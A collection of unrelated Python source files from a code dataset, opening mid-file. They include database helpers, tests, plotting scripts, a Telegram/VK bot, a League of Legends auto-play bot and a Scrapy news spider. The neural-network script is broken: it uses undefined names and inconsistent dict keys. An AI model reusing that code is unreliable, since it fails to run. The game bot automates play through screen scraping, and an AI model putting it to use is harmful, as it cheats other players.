is a parent of.\n all_quests(list>>): the list of all quests\n processed this far.\n\n Returns:\n None: as the list is modified in place\n \"\"\"\n conn = sqlite3.connect(MY_DATABASE)\n cur = conn.cursor()\n\n cur.execute(\"\"\" SELECT * FROM quest_levels WHERE name=?\"\"\", (quest_name,))\n skills = string_skills(get_level_dictionary(cur.fetchone()))\n this_quest_skills_info = skills\n\n cur.execute(\"\"\" SELECT requirement\n FROM quest_other_requirements\n WHERE name=?\"\"\", (quest_name,))\n other_requirements = [x[0] for x in cur.fetchall()]\n this_quest_skills_info[\"other requirements\"] = other_requirements\n this_quest_skills_info[\"name\"] = quest_name\n this_quest_skills_info[\"parent quest\"] = parent_quest\n\n all_quests.append(this_quest_skills_info)\n # TODO: update return types to match this in documentation\n\n cur.execute(\"\"\" SELECT pre_quest FROM pre_quests WHERE main_quest=?\"\"\",\n (quest_name, ))\n sub_quests = [x[0] for x in cur.fetchall()]\n cur.close()\n conn.close()\n\n for quest in sub_quests:\n get_quest_info_recursive(quest, quest_name, all_quests)\n\n\ndef get_quest_info_including_sub(quest_name):\n \"\"\" For the quest with the given name return its level as well as the\n levels for all its subquests.\n\n Parameters:\n quest_name(str): the name of the quest we are investigating\n\n Returns:\n list>>: a list where each item corresponds\n to a particular quest (in subquest order). This is a dictionary\n containing the quest name, mapped to the levels, parent quest\n and other requirements for that quest.\n\n\n \"\"\"\n all_quests = []\n parent_quest = None\n get_quest_info_recursive(quest_name, parent_quest, all_quests)\n return all_quests\n","sub_path":"database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":7453,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"590049748","text":"import re\n\n\ndef process_josa(sentence):\n josa_list = ['은(는)', '을(를)', '이(가)']\n\n for josa in josa_list:\n substr = re.sub('[()]', '', josa)\n\n while sentence.find(josa) != -1:\n x = sentence[sentence.find(josa) - 1]\n\n if (ord(x) - ord('가')) % 28 == 0:\n sentence = sentence.replace(josa, substr[1])\n else:\n sentence = sentence.replace(josa, substr[0])\n\n return sentence\n\n\nif __name__ == '__main__':\n s = '나은(는) 여자을(를) 사랑한다.'\n print(process_josa(s))\n","sub_path":"question/recommend/josa.py","file_name":"josa.py","file_ext":"py","file_size_in_byte":572,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"195589880","text":"from page.home.sign_up_page import SignUpPage\nimport pytest\nimport unittest\nimport time\n\n\n@pytest.mark.usefixtures(\"oneTimeSetUp\", \"setUp\")\nclass SignUpTests(unittest.TestCase):\n\n @pytest.fixture(autouse=True)\n def classSetUp(self, oneTimeSetUp):\n self.sp = SignUpPage(self.driver)\n self.sp.getSignUpWindow()\n\n # def test_verifySignUpFailed(self):\n # self.sp.sign_up(\"marishenk\")\n # time.sleep(3)\n # result = self.sp.verifySignUpFailed()\n # assert result == True\n # print(\"Try sign up one more time\")\n\n def test_verifySignUpSuccessful(self):\n # self.sp.clearEmailField()\n # self.sp.checkbox()\n self.sp.sign_up(\"margdga\", \"marfdgdfgfdhenk@mail.ru\", \"Medfgfdgege123\")\n result = self.sp.verifySignUpSuccessful()\n assert result is True\n print(\"Sign up was successful\")\n time.sleep(3)","sub_path":"tests/home/sign_up_tests.py","file_name":"sign_up_tests.py","file_ext":"py","file_size_in_byte":889,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"496975152","text":"# importamos matplotlib con el alias plt\nimport matplotlib.pyplot as plt\n\nganacias = [1000, 2500, 1200, 2200]\ntiempo = ['2018', '2019', '2020', '2021']\n\n\ndef chart_basic():\n plt.plot(ganacias, tiempo)\n plt.ylabel('Tiempo')\n plt.xlabel('Ganancias')\n plt.show()\n\n\ndef chart_points():\n plt.plot(ganacias, tiempo, 'ro')\n # plt.axis([1000, 1200, 1400, 1500])\n plt.show()\n\n\ndef chart_bar():\n fig, ax = plt.subplots()\n rects1 = ax.bar(tiempo, ganacias, color=\"green\")\n ax.set_title('Tiempo X Ganancias del 2018 - 2021')\n ax.set_xlabel('Tiempo')\n ax.set_ylabel('Ganancias')\n ax.bar_label(rects1, padding=3)\n plt.savefig('chart_bar_green.svg')\n # plt.show()\n\n\ndef chart_pie():\n labels = 'Producto1', 'Producto2', 'Producto3', 'Producto4'\n sizes = [15, 30, 5, 50]\n explode = (0, 0.1, 0, 0)\n fig, ax = plt.subplots()\n ax.pie(sizes, labels=labels, shadow=True, startangle=90,\n autopct='%1.1f%%', explode=explode, textprops=dict(color=\"b\"))\n ax.legend()\n\n plt.show()\n\n\nchart_pie()\n\n\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1046,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"195101735","text":"def shell_sort(li):\n \"\"\"希尔排序\"\"\"\n n = len(li)\n gap = n // 2\n while gap: # 我的写法,比较简洁\n # 控制步长的缩短\n for j in range(gap, n):\n # 插入算法,与普通插入算法的区别就是 gap 步长\n i = j\n while i > 0:\n if li[i] < li[i - gap]:\n li[i], li[i - gap] = li[i - gap], li[i]\n else:\n break\n i -= gap\n # 缩短 gap 步长\n gap = gap // 2\n\nalist = [54, 26, 93, 17, 77, 31, 44, 55, 20]\nshell_sort(alist)\nprint(alist)\n\"\"\"\n[17, 20, 26, 31, 44, 54, 55, 77, 93]\n\"\"\"\n","sub_path":"darkhorse/24_数据结构和算法/hm014_希尔排序.py","file_name":"hm014_希尔排序.py","file_ext":"py","file_size_in_byte":652,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"178670801","text":"from com.deconware.algorithms.psf.PsfGenerator import PsfType\n\nclass CreatePsf(object):\n\tdef __init__(self, space, emissionWavelength, numericalAperture, lensRefractiveIndex, \\\n\t\t\t\t\tspecimenRefractiveIndex, specimenDepth, homeDirectory=\"\", scopeType=PsfType.WIDEFIELD):\n\t\tself.space=space\n\t\tself.emissionWavelength=emissionWavelength \n\t\tself.numericalAperture=numericalAperture\n\t\tself.lensRefractiveIndex=lensRefractiveIndex \n\t\tself.specimenRefractiveIndex=specimenRefractiveIndex \n\t\tself.specimenDepth=specimenDepth \n\t\tself.homeDirectory=homeDirectory\n\n\tdef createPsf(self, ops, size):\n\t\treturn ops.run(\"psf\", size[0], size[2], self.space, self.emissionWavelength, self.numericalAperture, self.lensRefractiveIndex, self.specimenRefractiveIndex, self.specimenDepth)\n\t\t\n","sub_path":"jython/psf/CreatePsf.py","file_name":"CreatePsf.py","file_ext":"py","file_size_in_byte":769,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"297507015","text":"from numpy import *\n\nrandom.seed(1)\n\ndef sigmoid(x,deriv=False):\n if(deriv==True):\n return x * (1-x)\n return 1/(1+exp(-x))\n\ndef init_weights(in_,out_):\n return 2*random.random((in_,out_)) - 1\n \nX = array( [[0,0,0,0,0,1],\n [0,0,0,0,1,0],\n [1,0,1,0,0,0],\n [1,1,1,0,0,0],\n [0,1,0,1,0,1],\n [1,0,1,0,1,0],\n [1,0,0,0,0,0],\n [0,1,0,1,0,0],\n [0,0,0,1,1,0],\n\n [0,1,1,0,0,1],\n [1,1,0,0,1,0],\n [1,1,1,1,1,1],\n [1,1,1,0,0,0],\n [0,1,0,1,0,1],\n [1,0,1,0,1,0],\n [1,1,0,0,0,0],\n [0,1,0,1,0,0],\n [0,0,1,1,1,0],\n [0,0,0,0,0,0],\n [1,0,0,1,1,0]])\n \ny = array( [[0],\n\t\t\t[1],\n\t\t\t[1],\n\t\t\t[0],\n [0],\n [1],\n [1],\n [0],\n [0],\n \n [0],\n\t\t\t[0],\n\t\t\t[0],\n\t\t\t[0],\n [0],\n [1],\n [0],\n [0],\n [0],\n [0],\n [0]])\n\nsyn1 = init_weights(6,24)\nsyn2 = init_weights(24,48)\nsyn3 = init_weights(48,96)\nsyn4 = init_weights(96,192)\nsyn5 = init_weights(192,96)\nsyn6 = init_weights(96,48)\nsyn7 = init_weights(48,24)\nsyn8 = init_weights(24,12)\nsyn9 = init_weights(12,6)\nsyn10= init_weights(6,1)\n\nfor _ in range(60000):\n\n layers= dict(\n l0 = X, \n l1 = sigmoid(dot(l0,syn1)),\n l2 = sigmoid(dot(l1,syn2)),\n l3 = sigmoid(dot(l2,syn3)),\n l4 = sigmoid(dot(l3,syn4)),\n l5 = sigmoid(dot(l4,syn5)),\n l6 = sigmoid(dot(l5,syn6)),\n l7 = sigmoid(dot(l6,syn7)),\n l8 = sigmoid(dot(l7,syn8)),\n l9 = sigmoid(dot(l8,syn9)),\n l10 = sigmoid(dot(l9,syn10))\n )\n\n\n l10_error = y - layers[10]\n l10_weighted_errors = l10_error*sigmoid(layers[10],deriv=True)\n \n if (_% 10000) == 0:\n print (\"Error:\" + str(mean(abs(l10_error))))\n \n\n l9_error = dot(l10_weighted_errors, syn10.T)\n l9_weighted_errors = l9_error * sigmoid(layers[9],deriv=True)\n\n l8_error = l9_weighted_errors.dot(syn9.T)\n l8_weighted_errors = l8_error * sigmoid(layers[8],deriv=True)\n\n l7_error = l8_weighted_errors.dot(syn8.T)\n l7_weighted_errors = l7_error * sigmoid(layers[7],deriv=True)\n\n l6_error = l7_weighted_errors.dot(syn7.T)\n l6_weighted_errors = l6_error * sigmoid(layers[6],deriv=True)\n\n l5_error = l6_weighted_errors.dot(syn6.T)\n l5_weighted_errors = l5_error * sigmoid(layers[5],deriv=True)\n\n l4_error = l5_weighted_errors.dot(syn5.T)\n l4_weighted_errors = l4_error * sigmoid(laters[4],deriv=True)\n\n l3_error = l4_weighted_errors.dot(syn4.T)\n l3_weighted_errors = l3_error * sigmoid(layers[3],deriv=True)\n\n l2_error = l3_weighted_errors.dot(syn3.T)\n l2_weighted_errors = l2_error * sigmoid(layers[2], deriv=True) \n\n l1_error = l2_weighted_errors.dot(syn2.T)\n l1_weighted_errors = l1_error * sigmoid(layers[1], deriv=True)\n \n syn10 += l9.T.dot(l10_weighted_errors)\n syn9 += l8.T.dot(l9_weighted_errors)\n syn8 += l7.T.dot(l8_weighted_errors)\n syn7 += l6.T.dot(l7_weighted_errors)\n syn6 += l5.T.dot(l6_weighted_errors)\n syn5 += l4.T.dot(l5_weighted_errors)\n syn4 += l3.T.dot(l4_weighted_errors)\n syn3 += l2.T.dot(l3_weighted_errors)\n syn2 += l1.T.dot(l2_weighted_errors)\n syn1 += l0.T.dot(l1_weighted_errors)\n\na=(sigmoid(dot(array([1,1,1,0,1,0]), syn1)))\nb=sigmoid(dot(a, syn2))\nc=sigmoid(dot(b,syn3))\nd=sigmoid(dot(c,syn4))\ne=sigmoid(dot(d,syn5))\nf=sigmoid(dot(e,syn6))\ng=sigmoid(dot(f,syn7))\nh=sigmoid(dot(g,syn8))\ni=sigmoid(dot(h,syn9))\nj=sigmoid(dot(i,syn10))\n\nprint(j)","sub_path":"neuro1.py","file_name":"neuro1.py","file_ext":"py","file_size_in_byte":3721,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"13394871","text":"import config\nimport telebot,datetime,aiohttp,asyncio\n\n\nbot = telebot.TeleBot(config.token)\n\n@bot.message_handler(commands=[\"hello\"])\ndef repeat_all_messages(message): # Название функции не играет никакой роли, в принципе\n bot.send_message(message.chat.id, 'Hi')\n\nasync def loading(messege):\n bot.send_message(messege.chat.id,'Loading...')\n\nasync def friends_ages(message):\n await loading(message)\n try:\n username = message.text.split(' ')[1]\n except:\n bot.send_message(message.chat.id,'Вы забыли ввести id пользователя')\n return 0\n async with aiohttp.ClientSession() as session:\n async with session.get(\"https://api.vk.com/method/users.get?user_ids=\"+username+\"&fields=bdate&v=5.58\") as resp:\n req_id = await resp.json()\n try:\n user_id = req_id['response'][0].get('id')\n except:\n bot.send_message(message.chat.id,'Такого пользователя не существует')\n return 0\n async with session.get(\"https://api.vk.com/method/friends.get?user_id=\"+str(user_id)+\"&fields=bdate&v=5.58\") as resp:\n req = await resp.json()\n count = req['response'].get('count')\n i = 0\n bArr = []\n while i < count:\n bdate = req['response']['items'][i].get('bdate')\n if bdate:\n if len(bdate) > 5:\n try:\n bdate = datetime.datetime.strptime(bdate, \"%d.%m.%Y\")\n bArr.insert(i, bdate)\n except:\n print('1')\n i += 1\n diag = [0 for i in range(150)]\n count1 = len(bArr)\n i = 0\n a = []\n while i < count1:\n result = (datetime.datetime.today() - bArr[i]) / 365\n result = str(result).split(' ')\n j = int(result[0])\n diag[j] += 1\n i += 1\n\n i = 0\n cnt = len(diag)\n answer = [' ']\n while i < cnt:\n if diag[i] != 0:\n j = 0\n answer.append(str(i))\n answer.append('-')\n while j < diag[i]:\n answer.append(\".\")\n j += 1\n answer.append(\"\\n\")\n\n i += 1\n bot.send_message(message.chat.id,' '.join(answer))\n\nasync def group_ages(message):\n offset = 0\n await loading(message)\n try:\n groupname = message.text.split(' ')[1]\n except:\n bot.send_message(message.chat.id,'Вы забыли ввести id группы')\n return 0\n async with aiohttp.ClientSession() as session:\n async with session.get(\"https://api.vk.com/method/groups.getMembers?group_id=\"+groupname+\"&offset=\"+str(offset)+\"&fields=bdate&fields=bdate&v=5.58\") as resp:\n req_id = await resp.json()\n count = req_id['response'].get('count')\n loops= count/1000\n i = 0\n bArr=[]\n while i < loops:\n async with session.get(\"https://api.vk.com/method/groups.getMembers?group_id=\" + groupname + \"&offset=\" + str(offset) + \"&fields=bdate&fields=bdate&v=5.58\") as resp:\n j = 0\n req = await resp.json()\n if count-((i+1)*1000)>0:\n con = 1000\n per = int(100*1000*(i+1)/count)\n else:\n con = 1000-abs(count-(i+1)*1000)\n per = 100\n while j < con:\n bdate = req['response']['items'][j].get('bdate')\n if bdate:\n if len(bdate) > 5:\n try:\n bdate = datetime.datetime.strptime(bdate, \"%d.%m.%Y\")\n bArr.insert(j, bdate)\n except:\n print(\"wrong\")\n j += 1\n i += 1\n offset += 1000\n print(\"Выполнено: \"+str(per)+\"%\")\n diag = [0 for i in range(120)]\n count1 = len(bArr)\n i = 0\n while i < count1:\n result = (datetime.datetime.today() - bArr[i]) / 365\n result = str(result).split(' ')\n j = int(result[0])\n diag[j] += 1\n i += 1\n answer = [\" \"]\n i = 0\n cnt = len(diag)\n answer.append(\"Возраст - Кол-во\"+ \"\\n\")\n while i < cnt:\n if diag[i] != 0:\n answer.append(str(i))\n answer.append(' - ')\n answer.append(str(diag[i]))\n answer.append(\"\\n\")\n\n i += 1\n bot.send_message(message.chat.id,' '.join(answer))\n\n@bot.message_handler(commands=[\"friends_ages\"])\ndef friends(message):\n loop = asyncio.new_event_loop()\n asyncio.set_event_loop(loop)\n # Blocking call which returns when the display_date() coroutine is done\n loop.run_until_complete(friends_ages(message))\n loop.close()\n\n@bot.message_handler(commands=[\"group_ages\"])\ndef groups(message):\n loop = asyncio.new_event_loop()\n asyncio.set_event_loop(loop)\n # Blocking call which returns when the display_date() coroutine is done\n loop.run_until_complete(group_ages(message))\n loop.close()\n\nif __name__ == '__main__':\n bot.polling(none_stop=True)\n","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":5912,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"333764234","text":"from random import randint, random\nfrom time import sleep, time\n\nimport cv2\nimport pyautogui\nimport win32api\nimport win32con\nfrom PIL import ImageGrab\nfrom pykeyboard import PyKeyboard\nfrom pymouse import PyMouse\nfrom pynput.mouse import Controller\n\nfrom imginit import ImgInit\nfrom action import *\nfrom numpy import where, hstack\n\nmouse = Controller()\nm = PyMouse()\nk = PyKeyboard()\n\n# --------------------------位置信息----------------------\n# 装备位置 紫框\nequipPosX = [298, 342, 317, 351, 320, 334, 401, 380, 390, 440]\nequipPosY = [765, 729, 691, 666, 633, 595, 663, 634, 595, 633]\n\n# 英雄位置 红字标注\nheroPosX = [782, 582, 707, 838, 901, 1218, 1019, 1350]\nheroPosY = [444, 676, 676, 676, 444, 676, 444, 676]\n\n# 观众席坐标 棕框\nwatcherPosX = [446, 555, 674, 790, 906, 1022, 1137, 1253, 1366]\nwatcherPosY = [744, 739, 742, 743, 743, 744, 743, 744, 743]\n\n# 选择客户端\nX_START = 240\nX_END = 1700\nY_START = 200\nY_END = 1080\nsize = (X_START, Y_START, X_END, Y_END)\n\n# 小图坐标\nimgPos = {}\nimgPos['ChooseHero'] = (476, 900, 1493, 1072) # 英雄购买框 粉框\nimgPos['inGame'] = (263, 875, 468, 1074) # DF框 绿框\nimgPos['myTurn'] = (399, 82, 1528, 626) # 整个棋盘 蓝框\nimgPos['myHero'] = (419, 308, 1458, 623) # 半张棋盘 红框\nimgPos['start'] = (X_START, Y_START, X_END, Y_END) # 客户端\nimgPos['rightClick'] = (450, 172, 1419, 725) # 捡球坐标 黑框\n\n\n# --------------------------计时参数----------------------\nstartTime = time() # 游戏开始时间\nlastDTime = time() # 上一次D人的时间\nlastFTime = time() # 上一次上人口的时间\nlastEquipTime = time() # 上次装备时间\nlastBallTime = time() # 上次捡球时间\n\n\n# --------------------------启动标识----------------------\n# 点击接受比赛后,启动标识重置为1,第一次开始己方回合,startTime更新\nstart_flag = 1\n\n\n# --------------------------加载图片资源----------------------\nstartIcon, ChooseHeroIcon, rightClickIcon, leftClickDelayIcon, judgeHeroIcon, flags = ImgInit()\n\n\n# --------------------------------调试-------------------------------------\n# 方便看执行到哪一步了\ndebug_flag = 1\n\n\ndef show_action(info):\n if debug_flag:\n print(info)\n\n\n# --------------------------------识别-------------------------------------\n# 抓图\ndef grabRaw(imgKey):\n pic = ImageGrab.grab(imgPos[imgKey])\n pic.save(\"target.jpg\")\n target = cv2.imread(\"target.jpg\")\n show_action('抓图' + imgKey)\n return target\n\n\n# 评价模块\ndef judge(target, source):\n result = cv2.matchTemplate(target, source, cv2.TM_SQDIFF_NORMED)\n min_val, max_val, min_loc, max_loc = cv2.minMaxLoc(result)\n return min_val, min_loc\n\n\n# 判断是否在游戏中 || 用是否有D F来判断\ndef judgeInGame():\n target = grabRaw('inGame')\n min_val, min_loc = judge(target, flags['in_game_flag']) # 检测是否在游戏中\n if min_val < 0.25:\n return True\n min_val, min_loc = judge(target, flags['in_game_flag2']) # 检测是否在游戏中\n if min_val < 0.25:\n return True\n return False\n\n\n# 判断是否是己方回合 || 用是否有友方血条和地方血条判断\ndef judgeMyTurn():\n\n target = grabRaw('myTurn')\n\n # 开局五分钟后再判断是否有敌方血条,要不然开局都是野怪,会愣着不动\n if (time() - startTime) > 180:\n min_val, min_loc = judge(target, flags['fighting_flag3']) # 没有敌方血条\n if min_val < flags['threshold']:\n return False\n min_val, min_loc = judge(target, flags['fighting_flag']) # 有友方血条\n if min_val < flags['threshold']:\n return True\n min_val, min_loc = judge(target, flags['fighting_flag2']) # 有友方血条\n if min_val < flags['threshold']:\n return True\n return False\n\n\n# 判断选中的是哪个英雄\ndef judgeHero(singlePos):\n hero = -1\n rightClick(singlePos[0], singlePos[1]) # 右键点击,呼出英雄界面\n sleep(0.7)\n pic = ImageGrab.grab(\n (singlePos[0] - 500,\n singlePos[1] - 400,\n singlePos[0] + 500,\n singlePos[1] + 400)) # 以点击处为中心,截取附近的图像,保证英雄信息可以被截取\n pic.save(\"target.jpg\")\n target = cv2.imread(\"target.jpg\")\n\n # 遍历,找匹配解\n for key in list(judgeHeroIcon.keys())[:-2]:\n min_val, min_loc = judge(target, judgeHeroIcon[key])\n if min_val < ChooseHeroIcon['threshold']:\n hero = list(judgeHeroIcon.keys()).index(key)\n break\n show_action('识别英雄' + str(hero))\n return hero\n\n\n# --------------------------------命令执行-------------------------------------\n# 执行按键命令\ndef doKey(key_dir, LorR):\n\n target = grabRaw(key_dir['name'])\n key_list = list(key_dir.keys())\n\n for key in key_list[:-2]:\n t_height, t_width = key_dir[key].shape[:2]\n min_val, min_loc = judge(target, key_dir[key])\n if min_val < key_dir['threshold']:\n show_action('执行' + key[:-4])\n\n if LorR == 'L':\n leftClick(\n imgPos[key_dir['name']][0] + min_loc[0] + t_width // 2,\n imgPos[key_dir['name']][1] + min_loc[1] + t_height // 2)\n if LorR == 'R':\n rightClick(\n imgPos[key_dir['name']][0] + min_loc[0] + t_width // 2,\n imgPos[key_dir['name']][1] + min_loc[1] + t_height // 2)\n sleep(0.1)\n\n\n# 给重开单独做一个按键函数,提高效率\ndef startKey():\n key_dir = startIcon\n\n target = grabRaw(key_dir['name'])\n key_list = list(key_dir.keys())\n\n for key in key_list[:-2]:\n t_height, t_width = key_dir[key].shape[:2]\n min_val, min_loc = judge(target, key_dir[key])\n if min_val < key_dir['threshold']:\n if key == 'accept_match.png':\n show_action('--------------开始新游戏------------------')\n global start_flag\n start_flag = 1\n show_action('执行' + key[:-4])\n leftClick(\n imgPos[key_dir['name']][0] + min_loc[0] + t_width // 2,\n imgPos[key_dir['name']][1] + min_loc[1] + t_height // 2)\n sleep(0.1)\n\n# 执行D命令 D命令有两种\n\n\ndef D():\n # 两费D的图标\n t_height, t_width = leftClickDelayIcon['d1.png'].shape[:2]\n target = grabRaw('inGame')\n min_val, min_loc = judge(target, leftClickDelayIcon['d1.png'])\n if min_val < leftClickDelayIcon['threshold']:\n show_action('D')\n leftClick(\n imgPos['inGame'][0] + min_loc[0] +\n t_width //\n 2,\n imgPos['inGame'][1] + min_loc[1] +\n t_height //\n 2)\n sleep(0.1)\n return\n\n # 零费D的图标\n t_height, t_width = leftClickDelayIcon['d2.png'].shape[:2]\n target = grabRaw('inGame')\n min_val, min_loc = judge(target, leftClickDelayIcon['d1.png'])\n if min_val < leftClickDelayIcon['threshold']:\n show_action('D')\n leftClick(\n imgPos['inGame'][0] + min_loc[0] +\n t_width //\n 2,\n imgPos['inGame'][1] + min_loc[1] +\n t_height //\n 2)\n sleep(0.1)\n\n\n# 执行F命令\ndef F():\n t_height, t_width = leftClickDelayIcon['f.png'].shape[:2]\n target = grabRaw('inGame')\n min_val, min_loc = judge(target, leftClickDelayIcon['f.png'])\n if min_val < leftClickDelayIcon['threshold']:\n show_action('F')\n leftClick(\n imgPos['inGame'][0] + min_loc[0] +\n t_width //\n 2,\n imgPos['inGame'][1] + min_loc[1] +\n t_height //\n 2)\n sleep(0.1)\n\n\n# 购买英雄\ndef ChooseHero():\n # 开局3分钟保护\n if (time() - startTime) < 180:\n if random() > 0.7:\n leftClick(589, 984) # 购买左一英雄,防止打野打不过\n doKey(ChooseHeroIcon, 'L')\n\n\n# 获得英雄位置\ndef getHeroPos():\n try:\n # 多目标匹配,以英雄血条为基准,向右向下平移40,70像素,找到英雄的中心\n target = grabRaw('myHero')\n temp_HeroPos = []\n\n template = flags['fighting_flag']\n ret = cv2.matchTemplate(target, template, cv2.TM_CCORR_NORMED)\n index = where(ret > 0.9)\n for i in zip(*index[::-1]):\n temp_HeroPos.append((i[0] + 40, i[1] + 70))\n\n template = flags['fighting_flag2']\n ret = cv2.matchTemplate(target, template, cv2.TM_CCORR_NORMED)\n index = where(ret > 0.9)\n for i in zip(*index[::-1]):\n temp_HeroPos.append((i[0] + 40, i[1] + 70))\n\n # 因为截过图,转化为绝对坐标\n HeroPos = []\n done_flag = 0\n HeroPos.append((temp_HeroPos[0][0] + imgPos['myHero'][0],\n temp_HeroPos[0][1] + imgPos['myHero'][1]))\n\n # 多目标可能会对同一英雄多次识别,因此把太接近的位置合并\n for singlePos in temp_HeroPos:\n for donePos in HeroPos:\n if abs(\n singlePos[0] + imgPos['myHero'][0] -\n donePos[0]) < 15 and abs(\n singlePos[1] + imgPos['myHero'][1] -\n donePos[1]) < 15:\n\n done_flag = 0\n break\n done_flag = 1\n if done_flag:\n HeroPos.append(\n (singlePos[0] + imgPos['myHero'][0],\n singlePos[1] + imgPos['myHero'][1]))\n return HeroPos\n\n # 调试函数,取消注释可绘图,未来希望能在lol顶层绘制动态图框\n # 记得把上面的return也注释掉\n # draw_img = target.copy()\n # for test in temp_HeroPos:\n # rect = cv2.rectangle(draw_img, test, (test[0] - 40, test[1] - 70), (0, 0, 255), 1)\n #\n # cv2.imshow('rect', hstack((target, rect)))\n # cv2.waitKey(0)\n # cv2.destroyAllWindows()\n # print(HeroPos)\n\n except BaseException:\n return False\n\n\n# 卖掉英雄\ndef sellHero(singlePos):\n show_action('卖掉英雄')\n drag(singlePos[0], singlePos[1], 940 + randint(-30, 30), 993)\n sleep(random() / 3)\n\n\n# 调整英雄站位\ndef moveHero(aimPos, hero):\n # 移动前后相近,就不动了\n if abs(\n aimPos[0] -\n heroPosX[hero]) < 55 and abs(\n aimPos[1] -\n heroPosY[hero]) < 55:\n pass\n else:\n drag(aimPos[0], aimPos[1], heroPosX[hero], heroPosY[hero])\n show_action(str(hero) + '号英雄就位')\n sleep(random() / 3)\n\n\n# 装备\ndef moveEquip():\n rand_equip = randint(0, len(equipPosX) - 1)\n # 重点关照的英雄,这里选的是1号 3号 4号 6号\n hero_index = [0, 2, 3, 5]\n choose_hero = hero_index[randint(0, len(hero_index) - 1)]\n drag(\n equipPosX[rand_equip],\n equipPosY[rand_equip],\n heroPosX[choose_hero],\n heroPosY[choose_hero])\n show_action(str(rand_equip + 1) + '装备到' + str(choose_hero + 1) + '号英雄')\n sleep(random() / 3)\n\n# 新开游戏\n\n\ndef startNewGame():\n print(\"-----------------------------------------\")\n print(\"新的一局\")\n print(\"-----------------------------------------\")\n\n\n# 设置D的开始时间和间隔\ndef D_set(nowtime, begin, gap):\n global lastDTime\n if (nowtime - startTime) > begin:\n if (nowtime - lastDTime) > gap:\n D()\n lastDTime = time()\n\n\n# 设置F的开始时间和间隔\ndef F_set(nowtime, begin, gap):\n global lastFTime\n if (nowtime - startTime) > begin:\n if (nowtime - lastFTime) > gap:\n F()\n lastFTime = time()\n\n\n# 设置装备的开始时间和间隔\ndef equip_set(nowtime, begin, gap):\n global lastEquipTime\n if (nowtime - startTime) > begin:\n if (nowtime - lastEquipTime) > gap:\n moveEquip()\n lastEquipTime = time()\n\n\n# 设置装备的开始时间和间隔\ndef ball_set(nowtime, begin, gap):\n global lastBallTime\n if (nowtime - startTime) > begin:\n if (nowtime - lastBallTime) > gap:\n getBall()\n lastBallTime = time()\n\n\n# 捡球\ndef getBall():\n doKey(rightClickIcon, 'R')\n\n\nif __name__ == '__main__':\n print(\" ________ _____ \")\n print(r\"|__ / _ \\| ____|\")\n print(\" / / | | | _| \")\n print(\" / /| |_| | |___ \")\n print(r\"/____\\___/|_____|\")\n print(\"\")\n print(\"----作者:星†空----\")\n print(\"免费软件,切勿用作商业目的!!!!!!\")\n print(\"原作者: https://github.com/zhouxingkong/LOL-yunding\")\n\n print(\"灰烬猫猫 学习重构\")\n print('fork: https://github.com/AshenNeko/LOL-yunding')\n print(\"-----------------------------------------\")\n print(\"脚本已启动,请转到游戏界面\")\n print(\"-----------------------------------------\")\n while True:\n # ----------------------在游戏中---------------------------\n while judgeInGame():\n if start_flag:\n start_flag = 0\n startTime = time()\n show_action(\n '----------------------游戏开始,开始计时---------------------------')\n\n ChooseHero() # 买英雄\n\n # ----------------------己方回合---------------------------\n if judgeMyTurn():\n show_action(\n '----------------------进入己方回合---------------------------')\n PosList = getHeroPos() # 获得英雄位置\n # 获得位置失败\n if not PosList:\n continue\n # 获得成果\n for singlePos in PosList[:]: # 逐个遍历\n hero = judgeHero(singlePos) # 当前位置英雄ID\n\n # 再判别一遍,要不然非己方无法移动\n if judgeMyTurn():\n if hero >= 0: # 是想要的\n moveHero(singlePos, hero)\n else: # 不是想要的\n # 大于600s才开始卖英雄,防止前期无英雄可用\n if (time() - startTime) > 600:\n sleep(1)\n # 再判断一遍,防止误删\n if judgeHero(singlePos) < 0:\n sellHero(singlePos)\n else:\n break\n sleep(3)\n\n # ----------------------敌对回合---------------------------\n show_action(\n '----------------------进入对敌回合---------------------------')\n # 480s后开始装装备,10s一次尝试\n equip_set(time(), 480, 10)\n # 700s后开始D,30s一次尝试\n D_set(time(), 700, 30)\n # 700s后开始D,60s一次尝试\n F_set(time(), 700, 60)\n # 200s后开始找球,30s一次尝试\n ball_set(time(), 200, 30)\n ChooseHero() # 买英雄\n sleep(3)\n\n # ----------------------不在游戏中---------------------------\n show_action('----------------------不在游戏里---------------------------')\n startKey() # 执行开始游戏控件,保证游戏不断\n\n # 太久不动,可能是客户端有部分显示错误,尝试救赎\n if (time() - startTime) > 2400:\n leftClick(949, 785)\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":15497,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"311414368","text":"# -*- coding: utf-8 -*-\nimport scrapy\nimport time\nimport datetime\nimport pysolr\nclass ExampleSpider(scrapy.Spider):\n name = \"vnexpress\"\n solr = pysolr.Solr('http://localhost:8983/solr/nhom8/', timeout=10)\n arc_count=0\n contents=[]\n\n def start_requests(self):\n url1=\"https://vnexpress.net/tin-tuc/thoi-su/\"\n url2=\"https://vnexpress.net/tin-tuc/the-gioi/\"\n url3=\"https://kinhdoanh.vnexpress.net/\"\n url4=\"https://giaitri.vnexpress.net/\"\n url5=\"https://thethao.vnexpress.net/\"\n listurl=[]\n listurl.append(url1)\n listurl.append(url2)\n listurl.append(url3)\n listurl.append(url4)\n listurl.append(url5)\n for page in range(1,11):\n url=url1+\"page/\"+str(page)+\".html\"\n listurl.append(url)\n url=url2+\"page/\"+str(page)+\".html\"\n listurl.append(url)\n url=url3+\"page/\"+str(page)+\".html\"\n listurl.append(url)\n url=url4+\"page/\"+str(page)+\".html\"\n listurl.append(url)\n url=url5+\"page/\"+str(page)+\".html\"\n listurl.append(url)\n pass\n for url in listurl:\n yield scrapy.Request(url=url, 